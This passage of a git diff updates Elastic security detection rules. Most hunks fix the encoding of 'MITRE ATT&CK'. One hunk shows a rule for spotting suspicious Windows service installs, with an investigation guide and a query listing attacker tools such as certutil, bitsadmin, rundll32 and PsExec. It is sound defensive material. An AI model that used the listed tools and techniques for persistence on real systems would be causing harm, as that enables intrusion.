`Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "any where\n (event.code : \"4697\" and\n (winlog.event_data.ServiceFileName : \n (\"*COMSPEC*\", \"*\\\\172.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\", \n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\", \n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\") or\n winlog.event_data.ServiceFileName regex~ \"\"\"%systemroot%\\\\[a-z0-9]+\\.exe\"\"\")) or\n\n (event.code : \"7045\" and\n winlog.event_data.ImagePath : (\n \"*COMSPEC*\", \"*\\\\172.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\",\n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\",\n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\"))\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_8.json b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_8.json index f7be99016ba..113d58062af 100644 --- a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_8.json +++ b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_8.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Service was Installed in the System", - "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "any where\n (event.code : \"4697\" and\n (winlog.event_data.ServiceFileName : \n (\"*COMSPEC*\", \"*\\\\127.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\", \n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\", \n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\") or\n winlog.event_data.ServiceFileName regex~ \"\"\"%systemroot%\\\\[a-z0-9]+\\.exe\"\"\")) or\n\n (event.code : \"7045\" and\n winlog.event_data.ImagePath : (\n \"*COMSPEC*\", \"*\\\\127.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\",\n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\",\n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\"))\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_1.json b/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_1.json index e7bbd7966be..66865362c1c 100644 --- a/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_1.json +++ b/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_1.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_2.json b/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_2.json index cfac8d8201d..c48acd24f92 100644 --- a/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_2.json +++ b/packages/security_detection_engine/kibana/security_rule/daafdf96-e7b1-4f14-b494-27e0d24b11f6_2.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_104.json b/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_104.json index dd190891bc3..eb02af5eef6 100644 --- a/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_104.json +++ b/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_105.json b/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_105.json index c3637464448..fe16b016984 100644 --- a/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_105.json +++ b/packages/security_detection_engine/kibana/security_rule/dafa3235-76dc-40e2-9f71-1773b96d24cf_105.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_1.json b/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_1.json index 0150a937dc6..78bb4e994db 100644 --- a/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_1.json +++ b/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_2.json b/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_2.json index b291b69ce71..b8efb3fa919 100644 --- a/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_2.json +++ b/packages/security_detection_engine/kibana/security_rule/db65f5ba-d1ef-4944-b9e8-7e51060c2b42_2.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_2.json b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_2.json index f55a5adca23..93aec9ace31 100644 --- a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_2.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_3.json b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_3.json index 758879b20d4..48548aec7e7 100644 --- a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_3.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_4.json b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_4.json index 4dc461744ab..5999ab52322 100644 --- a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_4.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_100.json b/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_100.json index e57e347699a..31f1ef088dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_100.json +++ b/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_100.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_101.json b/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_101.json index 61d08cc80f9..2d90bcd18ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_101.json +++ b/packages/security_detection_engine/kibana/security_rule/db8c33a8-03cd-4988-9e2c-d0a4863adb13_101.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_1.json b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_1.json index 6eb408e8e66..6b486babf17 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_1.json +++ b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_1.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_2.json b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_2.json index ab40fe592ef..afb24ee3ee9 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_2.json +++ b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_2.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_3.json b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_3.json index 199778fcc02..ab8d7832c16 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_3.json +++ b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_3.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_4.json b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_4.json index ecc4df11709..d6bbe549c7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_4.json +++ b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_4.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_1.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_1.json index a773ea353fc..1ac0b2b141c 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_1.json +++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_2.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_2.json index 43206e1e49c..c04bdecdddc 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_2.json +++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_2.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_3.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_3.json index 854658c2935..b5a7fd3a1f9 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_3.json +++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_3.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_4.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_4.json index 4d77269fdd6..2bf4bed9b1f 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_4.json +++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_4.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_5.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_5.json index 079a825884b..2c101ac3084 100644 --- a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_5.json +++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_5.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_104.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_104.json index b89bf9ef216..ea7f3ae56ef 100644 --- 